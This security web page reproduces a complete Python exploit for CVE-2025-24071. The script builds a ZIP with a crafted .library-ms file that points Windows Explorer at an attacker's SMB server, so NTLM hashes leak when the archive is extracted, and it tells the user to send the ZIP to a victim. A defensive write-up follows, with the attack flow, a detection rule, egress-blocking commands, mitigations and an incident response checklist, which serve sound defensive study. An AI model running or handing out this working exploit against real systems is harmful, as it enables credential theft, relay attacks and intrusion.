Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure

Exploit Author: Mohammed Idrees Banyamer Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2025-05-29

#!/usr/bin/env python3
# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
# Exploit Author: Mohammed Idrees Banyamer
# Twitter/GitHub:https://github.com/mbanyamer 
# Date: 2025-05-27
# CVE: CVE-2025-24071
# Vendor: Microsoft
# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
# Tested on: Windows 11 (23H2)
# Type: Local / Remote (NTLM Leak)
# Platform: Windows
# Vulnerability Type: Information Disclosure
# Description:
#   Windows Explorer automatically initiates an SMB authentication request when a
#   .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
#   (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
#   No user interaction is required beyond extraction.

import zipfile
from pathlib import Path
import argparse
import re
import sys
from colorama import Fore, Style

def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    """Creates a malicious .library-ms file pointing to an attacker's SMB server."""
    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip}\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>'''
    
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file

def build_zip(library_file: Path, output_zip: Path):
    """Packages the .library-ms file into a ZIP archive."""
    with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
        archive.write(library_file, arcname=library_file.name)
    print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")

def is_valid_ip(ip: str) -> bool:
    return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
        epilog="example:\n  python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
        formatter_class=argparse.RawTextHelpFormatter
    )

    parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
    parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
    parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
    parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")

    args = parser.parse_args()

    if not is_valid_ip(args.ip):
        print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
        sys.exit(1)

    output_dir = Path(args.output)
    output_dir.mkdir(parents=True, exist_ok=True)

    print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
    library_file = create_library_ms(args.ip, args.name, output_dir)
    zip_file = output_dir / f"{args.name}.zip"
    build_zip(library_file, zip_file)

    if not args.keep:
        library_file.unlink()
        print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")

    print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")

if __name__ == "__main__":
    main()

Windows File Explorer (Windows 11 23H2) — NTLM Hash Disclosure (CVE-2025-24071)

Executive summary

CVE-2025-24071 describes an information-disclosure vulnerability in Windows File Explorer where extracting a specially crafted .library-ms file from a ZIP archive causes Explorer to initiate an SMB connection to a remote UNC path. That SMB negotiation can result in the endpoint sending NTLM authentication material (challenge/response hashes) to a remote server controlled by an attacker. The behavior can occur simply by extracting the archive with no further user interaction, making it a high-impact local/remote NTLM leak vector. Microsoft has assigned the CVE and published mitigations/patches — apply vendor updates as the primary remediation.

Background — what is a .library-ms and why this matters

.library-ms is an XML-based file format used by Windows Libraries to describe collection locations and search connectors. When Explorer processes a .library-ms, it may resolve embedded searchConnector or location URLs. If those URLs are UNC paths (\\server\share), Explorer attempts to contact the remote host, which can trigger SMB negotiation and NTLM-based authentication from the victim host to the remote server.

NTLM authentication exchanges contain hashed credential material that attackers can capture, relay, or attempt to crack offline. Even when the goal is not immediate account takeover, leaked NTLM hashes provide a valuable foothold for lateral movement and privilege escalation.

Affected systems and impact

Reported CVE: CVE-2025-24071
Affected: Windows 10/11 builds that parse .library-ms and perform network resolution in Explorer (details depend on patched builds; refer to Microsoft advisory for exact versions)
Impact: Information disclosure of NTLM hashed authentication material. Enables offline cracking, relay attacks, or other credential-based abuses.
Attack vector: Victim extracts a ZIP containing a crafted .library-ms (no further interaction required).

High-level attack flow (non-actionable)

Attacker embeds a .library-ms file referencing a remote UNC path in a ZIP.
Victim extracts the ZIP with Windows Explorer; Explorer parses the .library-ms.
Explorer resolves the UNC location and initiates an SMB connection to the remote host.
NTLM negotiation occurs and the client transmits authentication material to the remote server.
Attacker captures the NTLM hashes and can attempt to exploit them (offline cracking, relaying, etc.).

Detection guidance

Detecting exploitation attempts requires both network and endpoint telemetry. Key signals to look for:

Unexpected outbound SMB/TCP 445 (and 139) connections from workstations or servers to external or unusual internal IPs.
Windows Security logs showing network logon activity (e.g., Event ID 4624, Logon Type 3) correlated to unusual remote hosts.
Event logs where NTLM validation is attempted (historically Event ID 4776 on pre-Windows 10 systems; behavior may vary).
Endpoint telemetry (Sysmon) indicating explorer.exe (or another process) making outbound TCP connections to SMB ports.
Network IDS/IPS alerts for SMB negotiation attempts to unknown destinations, or SMB session setups originating from user endpoints.

Example detection rule (Sigma-style, defensive)


title: Explorer Outbound SMB Connection
detection:
  selection:
    Image|endswith: '\explorer.exe'
    DestinationPort: 445,139
  condition: selection
level: high
description: Detect explorer.exe initiating outbound SMB connections (may indicate .library-ms resolution to remote UNC)

Explanation: This Sigma-like rule flags cases where explorer.exe initiates outbound connections to SMB ports. In environments with centralized logging (Sysmon Event ID 3 or WFP/Firewall logs), such a rule can surface suspicious host-to-host SMB attempts. Tune to reduce false positives (e.g., legitimate file servers).

Mitigation and hardening

Prioritize installing Microsoft’s security update for CVE-2025-24071. Additional mitigations reduce exposure and limit credential leakage risk.

Apply vendor patches immediately: Follow Microsoft’s advisory and deploy the supplied updates across endpoints and servers.
Block SMB egress: Prevent workstations from making SMB connections to the broader network or Internet. Implement egress firewall rules to block TCP ports 445 and 139 for non-authorized hosts.
Restrict NTLM usage: Use domain policies to restrict or disable NTLM where feasible (Network security: Restrict NTLM authentication), and enable SMB signing to mitigate relay risks.
Email / attachment controls: Disallow or sandbox archives from untrusted senders; use content-disarm/inspection or block suspicious archive types in mail gateways.
EDR / AV tuning: Mark .library-ms extraction or creation as suspicious in endpoint controls so quarantine policies trigger on unexpected library file operations from user contexts.
Least privilege: Ensure user accounts are not local admins where unnecessary — reduced privilege limits lateral movement if hashes are abused.

Practical defensive commands (examples)

Below are defensive commands you can run as an administrator to help detect or block outbound SMB from Windows hosts. These are precautions and do not demonstrate exploit construction.


# Example: Create a Windows Firewall rule to block outbound SMB (TCP 445 and 139)
New-NetFirewallRule -DisplayName "Block Outbound SMB (Egress)" `
  -Direction Outbound -Action Block -Protocol TCP `
  -RemotePort 445,139 -Profile Any -Enabled True

Explanation: This PowerShell command creates a local firewall rule that blocks outbound TCP traffic on commonly used SMB ports. Deploy centrally via Group Policy or endpoint management for broad coverage.


# Example: Query installed updates (quick check for presence of security hotfixes)
Get-HotFix | Where-Object {$_.Description -match "Security" -or $_.HotFixID -match "KB"}

Explanation: This PowerShell snippet lists installed hotfixes. Use your patch-management system or Microsoft Update Catalog to verify the specific KB addressing CVE-2025-24071 is applied.

Incident response checklist

Isolate suspected hosts from network egress while preserving forensic data.
Collect Windows event logs (Security, System, Application), Sysmon logs, and firewall logs for the timeframe of the suspected extraction.
Capture a network packet trace (if still available) to look for SMB negotiation and NTLM challenge/response.
Search SIEM for explorer.exe or user hosts making SMB connections to unusual external addresses around the time of the event.
Reset or rotate credentials for accounts implicated in captured NTLM hashes and review for unauthorized access attempts.
Apply vendor patch across the environment and document remediation steps.

Risk reduction — longer term controls

Egress filtering across network boundaries to prevent endpoints talking directly to the Internet over SMB.
Network segmentation: separate user workstations from servers that require SMB access, with controlled and monitored jump hosts where required.
Enforce modern authentication where possible (Kerberos / certificate-based) and reduce NTLM dependencies.
Deploy comprehensive endpoint telemetry (Sysmon, EDR) and centralized log collection so anomalous SMB activity is detected quickly.

Responsible disclosure and vendor guidance

If you discover instances of this vulnerability in the wild, follow your organization’s incident response process and report discoveries to Microsoft via their security response channels if not already handled. Always prioritize patching from Microsoft as the definitive fix. Do not attempt to weaponize the vulnerability in testing outside a controlled lab environment.

Summary

CVE-2025-24071 is an important information-disclosure issue because it can cause NTLM authentication material to be sent to attacker-controlled SMB endpoints with minimal user interaction. The primary actions are: apply the Microsoft update, block SMB egress where appropriate, strengthen NTLM-related policies, and improve detection coverage for explorer.exe or workstation-originated SMB connections. Combining immediate mitigations with long-term hardening (egress filtering, disabling NTLM where possible, SMB signing) will substantially reduce exposure to similar credential-leak threats.